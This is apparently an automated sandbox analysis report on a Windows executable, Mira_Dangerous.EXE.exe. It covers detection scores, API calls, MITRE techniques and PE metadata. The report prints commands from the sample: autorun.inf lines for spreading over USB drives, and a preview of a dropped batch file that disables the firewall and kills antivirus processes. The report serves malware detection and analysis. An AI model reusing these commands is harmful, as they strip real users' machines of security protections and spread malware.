Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Mira_Dangerous.EXE.exe

Overview

General Information

Sample name:Mira_Dangerous.EXE.exe
Analysis ID:1670104
MD5:12bd30174702410955d46c23054a0fe6
SHA1:a0b47be3d815787f570becc5562e8e3483408ba3
SHA256:36f099c1287b25cbbc278f852079e6d48d1ac3f69b76112c86ef13db6c37e91a
Tags:exeuser-FelloBoiYuuka
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Found evasive API chain checking for process token information
May infect USB drives
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • Mira_Dangerous.EXE.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Mira_Dangerous.EXE.exe" MD5: 12BD30174702410955D46C23054A0FE6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe, ProcessId: 7084, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Cryptography
  • Compliance
  • Spreading
  • System Summary
  • Data Obfuscation
  • Persistence and Installation Behavior
  • Boot Survival
  • Malware Analysis System Evasion
  • Anti Debugging
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Mira_Dangerous.EXE.exeAvira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\MIRA_D~1.BATAvira: detection malicious, Label: BAT/Agent.1275
Source: Mira_Dangerous.EXE.exeVirustotal: Detection: 59%Perma Link
Source: Mira_Dangerous.EXE.exeReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7A8CC30EC
Source: Mira_Dangerous.EXE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: Mira_Dangerous.EXE.exe
Source: Binary string: wextract.pdbGCTL source: Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=[%%E:\%0] >> %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo action=Open folder to see files... >> %%E:\autorun.inf)
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205801907.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205801907.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205801907.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=[%%E:\%0] >> %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205801907.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo action=Open folder to see files... >> %%E:\autorun.inf)
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205896655.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205896655.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205896655.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=[%%E:\%0] >> %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205896655.0000014978445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo action=Open folder to see files... >> %%E:\autorun.inf)
Source: MIRA_D~1.BAT.0.drBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: MIRA_D~1.BAT.0.drBinary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: MIRA_D~1.BAT.0.drBinary or memory string: echo open=[%%E:\%0] >> %%E:\autorun.inf
Source: MIRA_D~1.BAT.0.drBinary or memory string: echo action=Open folder to see files... >> %%E:\autorun.inf)
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7A8CC204C
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7A8CC2C54
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7A8CC1C0C
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC2DB40_2_00007FF7A8CC2DB4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC6CA40_2_00007FF7A8CC6CA4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC66C40_2_00007FF7A8CC66C4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC40C40_2_00007FF7A8CC40C4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC5D900_2_00007FF7A8CC5D90
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC1D280_2_00007FF7A8CC1D28
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC1C0C0_2_00007FF7A8CC1C0C
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC35300_2_00007FF7A8CC3530
Source: Mira_Dangerous.EXE.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 2787 bytes, 1 file, at 0x2c +A "MIRA_D~1.BAT", ID 896, number 1, 1 datablock, 0x1503 compression
Source: Mira_Dangerous.EXE.exeBinary or memory string: OriginalFilename vs Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exe, 00000000.00000000.1151640839.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Mira_Dangerous.EXE.exe
Source: classification engineClassification label: mal64.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF7A8CC6CA4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7A8CC1C0C
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF7A8CC6CA4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC2DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF7A8CC2DB4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
Source: Mira_Dangerous.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Mira_Dangerous.EXE.exeVirustotal: Detection: 59%
Source: Mira_Dangerous.EXE.exeReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeSection loaded: advpack.dllJump to behavior
Source: Mira_Dangerous.EXE.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Mira_Dangerous.EXE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Mira_Dangerous.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: Mira_Dangerous.EXE.exe
Source: Binary string: wextract.pdbGCTL source: Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Mira_Dangerous.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Mira_Dangerous.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Mira_Dangerous.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Mira_Dangerous.EXE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: Mira_Dangerous.EXE.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7A8CC30EC
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7A8CC1684
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2438
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7A8CC204C
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7A8CC64E4
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7A8CC30EC
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7A8CC8494
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC8790 SetUnhandledExceptionFilter,0_2_00007FF7A8CC8790
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC12EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF7A8CC12EC
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7A8CC8964
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exeCode function: 0_2_00007FF7A8CC2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7A8CC2C54

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		2
Native API		1
Registry Run Keys / Startup Folder		1
Access Token Manipulation		1
Access Token Manipulation		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		1
Timestomp		LSASS Memory1
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS5
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1670104 Sample: Mira_Dangerous.EXE.exe Startdate: 21/04/2025 Architecture: WINDOWS Score: 64 10 Antivirus detection for dropped file 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 Multi AV Scanner detection for submitted file 2->14 5 Mira_Dangerous.EXE.exe 1 3 2->5         started        process3 file4 8 C:\Users\user\AppData\Local\...\MIRA_D~1.BAT, DOS 5->8 dropped

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Mira_Dangerous.EXE.exe59%VirustotalBrowse
Mira_Dangerous.EXE.exe44%ReversingLabsWin64.Trojan.KillAV
Mira_Dangerous.EXE.exe100%AviraBAT/Agent.1275

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\IXP000.TMP\MIRA_D~1.BAT100%AviraBAT/Agent.1275

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1670104
Start date and time:2025-04-21 05:29:16 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 17s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:1
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Mira_Dangerous.EXE.exe
Detection:MAL
Classification:mal64.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 25
  • Number of non-executed functions: 31
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\IXP000.TMP\MIRA_D~1.BAT

Download File
Process:C:\Users\user\Desktop\Mira_Dangerous.EXE.exe
File Type:DOS batch file, Non-ISO extended-ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):11542
Entropy (8bit):5.343447696512908
Encrypted:false
SSDEEP:96:XRfeAgV/RBA7lPxODVbi1qkaZM43Qp19AU4c8cppdDmjEDgPzRVri/u1FKY2x:XRlA/2lPxOpbrZ2p19AU4c8gbDkMgPe
MD5:6BD574A1523A552FAD065777400841DD
SHA1:C1552C362FBDB69FADF8535675FE9C91B55BEA75
SHA-256:A247F8867A0C5C3C6CF62B371085196E73E10A09E2A39D183B5B6578986439FF
SHA-512:2E5A0726F060DCFE66156F6C0881675B9DBEB60DB6AB42499559BE681345CAB289237C4368872350DAF89E97BBCDF200C249229827CCD7119104F1A5B5F830D8
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
Reputation:low
Preview:@echo off..start cock.co.ck..rem -------kill av---------..net stop .Security Center...netsh firewall set opmode mode=disable..tskill /A av*..tskill /A fire*..tskill /A anti*..cls..tskill /A spy*..tskill /A bullguard..tskill /A PersFw..tskill /A KAV*..tskill /A ZONEALARM..tskill /A SAFEWEB..cls..tskill /A OUTPOST..tskill /A nv*..tskill /A nav*..tskill /A F-*..tskill /A ESAFE..tskill /A cle..cls..tskill /A BLACKICE..tskill /A def*..tskill /A kav..tskill /A kav*..tskill /A avg*..tskill /A ash*..cls..tskill /A aswupdsv..tskill /A ewid*..tskill /A guard*..tskill /A guar*..tskill /A gcasDt*..tskill /A msmp*..cls..tskill /A mcafe*..tskill /A mghtml..tskill /A msiexec..tskill /A outpost..tskill /A isafe..tskill /A zap*..cls..tskill /A zauinst..tskill /A upd*..tskill /A zlclien*..tskill /A minilog..tskill /A cc*..tskill /A norton*..cls..tskill /A norton au*..tskill /A ccc*..tskill /A npfmn*..tskill /A loge*..tskill /A nisum*..tskill /A issvc..tskill /A tmp*..cls..tskill /A tmn*..tskill /A pcc*.

Static File Info

General

File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):6.8174006380421455
TrID:
  • Win64 Executable GUI (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Mira_Dangerous.EXE.exe
File size:160'256 bytes
MD5:12bd30174702410955d46c23054a0fe6
SHA1:a0b47be3d815787f570becc5562e8e3483408ba3
SHA256:36f099c1287b25cbbc278f852079e6d48d1ac3f69b76112c86ef13db6c37e91a
SHA512:f4eac97347ddf86ba8d342a7d4da21292ca1a5411e9ede8bf00feaa7c702185be108e2cd562c0e9024a4f53577730ff90b8c24fa5e06eb9e7c7590d7160c4fe6
SSDEEP:3072:oahKyd2n31q95GWp1icKAArDZz4N9GhbkrNEk1QT:oahOup0yN90QEj
TLSH:CAF38D4A63E420B6E4B6577498F202935A32BCB19F7582FF22C4D57E1E336C0A532B57
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

File Icon

Icon Hash:3b6120282c4c5a1f

Static PE Info

General

Entrypoint:0x140008200
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:10
OS Version Minor:0
File Version Major:10
File Version Minor:0
Subsystem Version Major:10
Subsystem Version Minor:0
Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Instruction
dec eax
sub esp, 28h
call 00007F6E048BC0A0h
dec eax
add esp, 28h
jmp 00007F6E048BB94Bh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000011CDh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [00004922h], ebx
je 00007F6E048BB94Ch
dec eax
cmp eax, ebx
jne 00007F6E048BB95Ch
mov edi, 00000001h
mov eax, dword ptr [00004918h]
cmp eax, 01h
jne 00007F6E048BB959h
lea ecx, dword ptr [eax+1Eh]
call 00007F6E048BBF33h
jmp 00007F6E048BB9BCh
mov ecx, 000003E8h
call dword ptr [0000117Eh]
jmp 00007F6E048BB909h
mov eax, dword ptr [000048F6h]
test eax, eax
jne 00007F6E048BB99Bh
mov dword ptr [000048E8h], 00000001h
dec esp
lea esi, dword ptr [000013E9h]
dec eax
lea ebx, dword ptr [000013CAh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F6E048BB967h
test eax, eax
jne 00007F6E048BB967h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F6E048BB952h
dec eax
mov eax, dword ptr [ebx]
dec eax
mov ecx, dword ptr [00001388h]
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1c130.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000x20.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0xf0000x1d0000x1c20033cfc8d11525f17bcdfb6630ba153019False0.7305729166666667data7.009359201962884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x2c0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
